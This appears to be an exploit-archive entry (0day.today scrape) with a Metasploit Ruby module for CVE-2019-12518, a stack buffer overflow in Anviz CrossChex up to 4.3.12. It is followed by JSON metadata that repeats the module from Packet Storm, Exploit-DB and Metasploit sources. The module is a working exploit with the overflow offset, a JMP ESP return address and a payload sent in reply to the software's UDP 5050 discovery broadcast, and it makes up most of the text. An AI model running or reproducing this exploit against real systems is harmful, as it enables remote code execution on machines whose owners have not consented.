ID 1337DAY-ID-33982
Type zdt
Reporter metasploit
Modified 2020-02-17T00:00:00
Description
Exploit for windows platform in category remote exploits
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit exploit module for CVE-2019-12518 (Anviz CrossChex stack buffer
# overflow, see the 'References' entry below).
#
# This module is passive rather than connect-out: it binds a UDP listener
# (CHOST:CPORT, default 0.0.0.0:5050), waits for a CrossChex device-discovery
# broadcast, and answers the *sender* of that broadcast with the overflow
# buffer. From a monitoring standpoint the observable event is therefore an
# unexpected host replying to the CrossChex discovery broadcast on UDP/5050
# with an oversized datagram (Offset + 4 + Shift + payload bytes).
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking
  # Maximum number of bytes read from the incoming broadcast. The datagram
  # body is never inspected beyond an emptiness check; only the sender's
  # address and port are used (see #exploit).
  PACKET_LEN = 10

  include Msf::Exploit::Remote::Udp

  # Registers module metadata (references, payload constraints, the single
  # x86 target) and swaps the UDP mixin's default options for listener-side
  # options, since this module receives before it sends.
  #
  # @param info [Hash] metadata merged via +update_info+
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Anviz CrossChex Buffer Overflow',
      # NOTE: 'Ainz' in the description text is a typo for 'Anviz'; left as-is
      # because it is a runtime string shown in module listings.
      'Description' => %q{
        Waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast,
        triggering a stack buffer overflow.
      },
      'Author' =>
      [
        'Luis Catarino <[email protected]>', # original discovery/exploit
        'Pedro Rodrigues <[email protected]>', # original discovery/exploit
        'agalway-r7', # Module creation
        'adfoster-r7' # Module creation
      ],
      'License' => MSF_LICENSE,
      'References' =>
      [
        ['CVE', '2019-12518'],
        ['URL', 'https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html'],
        ['EDB', '47734']
      ],
      'Payload' =>
      {
        'Space' => 8947, # upper bound on the encoded payload size appended in #exploit
        'DisableNops' => true # no NOP sled is generated; 'Shift' filler does the alignment
      },
      'Arch' => ARCH_X86,
      'EncoderType' => Msf::Encoder::Type::Raw,
      'Privileged' => true,
      'Platform' => 'win',
      'DisclosureDate' => '2019-11-28',
      'Targets' =>
      [
        [
          'Crosschex Standard x86 <= V4.3.12',
          {
            'Offset' => 261, # Overwrites memory to allow EIP to be overwritten
            'Ret' => "\x07\x18\x42\x00", # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data
            'Shift' => 4 # Positions payload to be written at beginning of ESP
          }
        ]
      ],
      'DefaultTarget' => 0
    ))
    # The peer is learned from the broadcast, not configured up front, so the
    # mixin's outbound options are dropped (presumably RHOST/RPORT — confirm
    # against Msf::Exploit::Remote::Udp) and replaced with listener options.
    deregister_udp_options
    register_options(
      [
        Opt::CPORT(5050, true, 'Port used to listen for CrossChex Broadcast.'),
        Opt::CHOST("0.0.0.0", true, 'IP address that UDP Socket listens for CrossChex broadcast on. \'0.0.0.0\' is needed to receive broadcasts.'),
        OptInt.new('TIMEOUT', [true, 'Time in seconds to wait for a CrossChex broadcast. 0 or less waits indefinitely.', 100])
      ])
  end

  # Waits for a single CrossChex discovery broadcast and replies to whichever
  # host/port sent it with the overflow buffer followed by the encoded payload.
  #
  # Fails via +fail_with+ (Failure::TimeoutExpired) when no datagram arrives
  # within TIMEOUT seconds; a TIMEOUT of 0 or less blocks indefinitely.
  def exploit
    connect_udp

    # A non-positive TIMEOUT becomes nil, i.e. no receive timeout. The module
    # treats an empty result as "timed out" rather than expecting an exception.
    res, host, port = udp_sock.recvfrom(PACKET_LEN, datastore["TIMEOUT"].to_i > 0 ? (datastore["TIMEOUT"].to_i) : (nil))
    if res.empty?
      fail_with(Failure::TimeoutExpired, "Module timed out waiting for CrossChex broadcast")
    end

    print_status "CrossChex broadcast received, sending payload in response"
    # Buffer layout: [Offset bytes of filler][Ret][Shift bytes of filler][payload].
    sploit = rand_text_english(target['Offset'])
    sploit << target.ret # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data
    sploit << rand_text_english(target['Shift']) # Positions payload to be written at beginning of ESP
    sploit << payload.encoded

    # The reply is addressed to the broadcast's source; nothing about the
    # received datagram is validated before answering it.
    udp_sock.sendto(sploit, host, port)
    print_status "Payload sent"
  end
end
# 0day.today [2020-02-21] #
{"id": "1337DAY-ID-33982", "bulletinFamily": "exploit", "title": "Anviz CrossChex - Buffer Overflow Exploit", "description": "Exploit for windows platform in category remote exploits", "published": "2020-02-17T00:00:00", "modified": "2020-02-17T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://0day.today/exploit/description/33982", "reporter": "metasploit", "references": [], "cvelist": ["CVE-2019-12518"], "type": "zdt", "lastseen": "2020-02-21T05:09:15", "edition": 1, "viewCount": 23, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-12518"]}, {"type": "exploitdb", "idList": ["EDB-ID:48092"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156335"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/MISC/CROSSCHEX_DEVICE_BOF"]}], "modified": "2020-02-21T05:09:15", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2020-02-21T05:09:15", "rev": 2}, "vulnersScore": 7.3}, "sourceHref": "https://0day.today/exploit/33982", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n PACKET_LEN = 10\r\n\r\n include Msf::Exploit::Remote::Udp\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Anviz CrossChex Buffer Overflow',\r\n 'Description'\t=> %q{\r\n Waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast,\r\n triggering a stack buffer overflow.\r\n },\r\n 'Author'\t \t=>\r\n [\r\n 'Luis Catarino <[email\u00a0protected]>', # original discovery/exploit\r\n 'Pedro Rodrigues <[email\u00a0protected]>', # original discovery/exploit\r\n 'agalway-r7', # Module creation\r\n 'adfoster-r7' # Module creation\r\n ],\r\n 'License'\t\t => MSF_LICENSE,\r\n 'References'\t=>\r\n [\r\n ['CVE', '2019-12518'],\r\n ['URL', 
'https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html'],\r\n ['EDB', '47734']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'Space' => 8947,\r\n 'DisableNops' => true\r\n },\r\n 'Arch' => ARCH_X86,\r\n 'EncoderType' => Msf::Encoder::Type::Raw,\r\n 'Privileged'\t=> true,\r\n 'Platform' => 'win',\r\n 'DisclosureDate' => '2019-11-28',\r\n 'Targets' =>\r\n [\r\n [\r\n 'Crosschex Standard x86 <= V4.3.12',\r\n {\r\n 'Offset' => 261, # Overwrites memory to allow EIP to be overwritten\r\n 'Ret' => \"\\x07\\x18\\x42\\x00\", # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data\r\n 'Shift' => 4 # Positions payload to be written at beginning of ESP\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0\r\n ))\r\n deregister_udp_options\r\n register_options(\r\n [\r\n Opt::CPORT(5050, true, 'Port used to listen for CrossChex Broadcast.'),\r\n Opt::CHOST(\"0.0.0.0\", true, 'IP address that UDP Socket listens for CrossChex broadcast on. \\'0.0.0.0\\' is needed to receive broadcasts.'),\r\n OptInt.new('TIMEOUT', [true, 'Time in seconds to wait for a CrossChex broadcast. 0 or less waits indefinitely.', 100])\r\n ])\r\n end\r\n\r\n def exploit\r\n connect_udp\r\n\r\n res, host, port = udp_sock.recvfrom(PACKET_LEN, datastore[\"TIMEOUT\"].to_i > 0 ? (datastore[\"TIMEOUT\"].to_i) : (nil))\r\n if res.empty?\r\n fail_with(Failure::TimeoutExpired, \"Module timed out waiting for CrossChex broadcast\")\r\n end\r\n\r\n print_status \"CrossChex broadcast received, sending payload in response\"\r\n sploit = rand_text_english(target['Offset'])\r\n sploit << target.ret # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data\r\n sploit << rand_text_english(target['Shift']) # Positions payload to be written at beginning of ESP\r\n sploit << payload.encoded\r\n\r\n udp_sock.sendto(sploit, host, port)\r\n print_status \"Payload sent\"\r\n end\r\nend\n\n# 0day.today [2020-02-21] #"}
{"cve": [{"lastseen": "2020-10-03T13:38:41", "description": "Anviz CrossChex access control management software 4.3.8.0 and 4.3.12 is vulnerable to a buffer overflow vulnerability.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-12-02T17:15:00", "title": "CVE-2019-12518", "type": "cve", "cwe": ["CWE-120"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-12518"], "modified": "2020-02-13T18:15:00", "cpe": ["cpe:/a:anviz:crosschex:4.3.8.0", "cpe:/a:anviz:crosschex:4.3.12"], "id": "CVE-2019-12518", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-12518", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:anviz:crosschex:4.3.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:anviz:crosschex:4.3.12:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2020-02-13T23:01:19", "description": "", "published": "2020-02-13T00:00:00", "type": "packetstorm", "title": "Anviz CrossChex Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-12518"], "modified": "2020-02-13T00:00:00", "id": "PACKETSTORM:156335", "href": 
"https://packetstormsecurity.com/files/156335/Anviz-CrossChex-Buffer-Overflow.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = NormalRanking \nPACKET_LEN = 10 \n \ninclude Msf::Exploit::Remote::Udp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Anviz CrossChex Buffer Overflow', \n'Description' => %q{ \nWaits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast, \ntriggering a stack buffer overflow. \n}, \n'Author' => \n[ \n'Luis Catarino <lcatarino@protonmail.com>', # original discovery/exploit \n'Pedro Rodrigues <pedrosousarodrigues@protonmail.com>', # original discovery/exploit \n'agalway-r7', # Module creation \n'adfoster-r7' # Module creation \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2019-12518'], \n['URL', 'https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html'], \n['EDB', '47734'] \n], \n'Payload' => \n{ \n'Space' => 8947, \n'DisableNops' => true \n}, \n'Arch' => ARCH_X86, \n'EncoderType' => Msf::Encoder::Type::Raw, \n'Privileged' => true, \n'Platform' => 'win', \n'DisclosureDate' => '2019-11-28', \n'Targets' => \n[ \n[ \n'Crosschex Standard x86 <= V4.3.12', \n{ \n'Offset' => 261, # Overwrites memory to allow EIP to be overwritten \n'Ret' => \"\\x07\\x18\\x42\\x00\", # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data \n'Shift' => 4 # Positions payload to be written at beginning of ESP \n} \n] \n], \n'DefaultTarget' => 0 \n)) \nderegister_udp_options \nregister_options( \n[ \nOpt::CPORT(5050, true, 'Port used to listen for CrossChex Broadcast.'), \nOpt::CHOST(\"0.0.0.0\", true, 'IP address that UDP Socket listens for CrossChex broadcast on. 
\\'0.0.0.0\\' is needed to receive broadcasts.'), \nOptInt.new('TIMEOUT', [true, 'Time in seconds to wait for a CrossChex broadcast. 0 or less waits indefinitely.', 100]) \n]) \nend \n \ndef exploit \nconnect_udp \n \nres, host, port = udp_sock.recvfrom(PACKET_LEN, datastore[\"TIMEOUT\"].to_i > 0 ? (datastore[\"TIMEOUT\"].to_i) : (nil)) \nif res.empty? \nfail_with(Failure::TimeoutExpired, \"Module timed out waiting for CrossChex broadcast\") \nend \n \nprint_status \"CrossChex broadcast received, sending payload in response\" \nsploit = rand_text_english(target['Offset']) \nsploit << target.ret # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data \nsploit << rand_text_english(target['Shift']) # Positions payload to be written at beginning of ESP \nsploit << payload.encoded \n \nudp_sock.sendto(sploit, host, port) \nprint_status \"Payload sent\" \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/156335/crosschex_device_bof.rb.txt"}], "metasploit": [{"lastseen": "2020-10-13T07:16:38", "description": "Waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast, triggering a stack buffer overflow.\n", "published": "2020-02-03T17:02:04", "type": "metasploit", "title": "Anviz CrossChex Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-12518"], "modified": "2020-03-06T10:41:45", "id": "MSF:EXPLOIT/WINDOWS/MISC/CROSSCHEX_DEVICE_BOF", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n PACKET_LEN = 10\n\n include Msf::Exploit::Remote::Udp\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Anviz CrossChex Buffer Overflow',\n 'Description' => %q{\n Waits for broadcasts from Ainz 
CrossChex looking for new devices, and returns a custom broadcast,\n triggering a stack buffer overflow.\n },\n 'Author' =>\n [\n 'Luis Catarino <lcatarino@protonmail.com>', # original discovery/exploit\n 'Pedro Rodrigues <pedrosousarodrigues@protonmail.com>', # original discovery/exploit\n 'agalway-r7', # Module creation\n 'adfoster-r7' # Module creation\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2019-12518'],\n ['URL', 'https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html'],\n ['EDB', '47734']\n ],\n 'Payload' =>\n {\n 'Space' => 8947,\n 'DisableNops' => true\n },\n 'Arch' => ARCH_X86,\n 'EncoderType' => Msf::Encoder::Type::Raw,\n 'Privileged' => true,\n 'Platform' => 'win',\n 'DisclosureDate' => '2019-11-28',\n 'Targets' =>\n [\n [\n 'Crosschex Standard x86 <= V4.3.12',\n {\n 'Offset' => 261, # Overwrites stack memory to allow saved EIP to be overwritten\n 'Ret' => \"\\x07\\x18\\x42\\x00\", # Overwrites saved EIP with address of 'JMP ESP' assembly instruction found in CrossChex code\n 'Shift' => 4 # Positions payload to be written at beginning of ESP\n }\n ]\n ],\n 'DefaultTarget' => 0\n )\n )\n deregister_udp_options\n register_options(\n [\n Opt::CPORT(5050, true, 'Port used to listen for CrossChex Broadcast.'),\n Opt::CHOST('0.0.0.0', true, 'IP address that UDP Socket listens for CrossChex broadcast on. \\'0.0.0.0\\' is needed to receive broadcasts.'),\n OptInt.new('TIMEOUT', [true, 'Time in seconds to wait for a CrossChex broadcast. 0 or less waits indefinitely.', 100])\n ]\n )\n end\n\n def exploit\n connect_udp\n\n res, host, port = udp_sock.recvfrom(PACKET_LEN, datastore['TIMEOUT'].to_i > 0 ? 
datastore['TIMEOUT'].to_i : nil)\n if res.empty?\n fail_with(Failure::TimeoutExpired, 'Module timed out waiting for CrossChex broadcast')\n end\n\n print_status 'CrossChex broadcast received, sending payload in response'\n sploit = rand_text_english(target['Offset'])\n sploit << target.ret # Overwrites saved EIP with address of 'JMP ESP' assembly instruction found in CrossChex code\n sploit << rand_text_english(target['Shift']) # Positions payload to be written at beginning of ESP\n sploit << payload.encoded\n\n udp_sock.sendto(sploit, host, port)\n print_status 'Payload sent'\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/crosschex_device_bof.rb"}], "exploitdb": [{"lastseen": "2020-02-17T17:33:37", "description": "", "published": "2020-02-17T00:00:00", "type": "exploitdb", "title": "Anviz CrossChex - Buffer Overflow (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-12518"], "modified": "2020-02-17T00:00:00", "id": "EDB-ID:48092", "href": "https://www.exploit-db.com/exploits/48092", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n PACKET_LEN = 10\r\n\r\n include Msf::Exploit::Remote::Udp\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Anviz CrossChex Buffer Overflow',\r\n 'Description'\t=> %q{\r\n Waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast,\r\n triggering a stack buffer overflow.\r\n },\r\n 'Author'\t \t=>\r\n [\r\n 'Luis Catarino <lcatarino@protonmail.com>', # original discovery/exploit\r\n 'Pedro Rodrigues <pedrosousarodrigues@protonmail.com>', # original discovery/exploit\r\n 'agalway-r7', # Module creation\r\n 'adfoster-r7' # Module 
creation\r\n ],\r\n 'License'\t\t => MSF_LICENSE,\r\n 'References'\t=>\r\n [\r\n ['CVE', '2019-12518'],\r\n ['URL', 'https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html'],\r\n ['EDB', '47734']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'Space' => 8947,\r\n 'DisableNops' => true\r\n },\r\n 'Arch' => ARCH_X86,\r\n 'EncoderType' => Msf::Encoder::Type::Raw,\r\n 'Privileged'\t=> true,\r\n 'Platform' => 'win',\r\n 'DisclosureDate' => '2019-11-28',\r\n 'Targets' =>\r\n [\r\n [\r\n 'Crosschex Standard x86 <= V4.3.12',\r\n {\r\n 'Offset' => 261, # Overwrites memory to allow EIP to be overwritten\r\n 'Ret' => \"\\x07\\x18\\x42\\x00\", # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data\r\n 'Shift' => 4 # Positions payload to be written at beginning of ESP\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0\r\n ))\r\n deregister_udp_options\r\n register_options(\r\n [\r\n Opt::CPORT(5050, true, 'Port used to listen for CrossChex Broadcast.'),\r\n Opt::CHOST(\"0.0.0.0\", true, 'IP address that UDP Socket listens for CrossChex broadcast on. \\'0.0.0.0\\' is needed to receive broadcasts.'),\r\n OptInt.new('TIMEOUT', [true, 'Time in seconds to wait for a CrossChex broadcast. 0 or less waits indefinitely.', 100])\r\n ])\r\n end\r\n\r\n def exploit\r\n connect_udp\r\n\r\n res, host, port = udp_sock.recvfrom(PACKET_LEN, datastore[\"TIMEOUT\"].to_i > 0 ? 
(datastore[\"TIMEOUT\"].to_i) : (nil))\r\n if res.empty?\r\n fail_with(Failure::TimeoutExpired, \"Module timed out waiting for CrossChex broadcast\")\r\n end\r\n\r\n print_status \"CrossChex broadcast received, sending payload in response\"\r\n sploit = rand_text_english(target['Offset'])\r\n sploit << target.ret # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data\r\n sploit << rand_text_english(target['Shift']) # Positions payload to be written at beginning of ESP\r\n sploit << payload.encoded\r\n\r\n udp_sock.sendto(sploit, host, port)\r\n print_status \"Payload sent\"\r\n end\r\nend", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/48092"}]}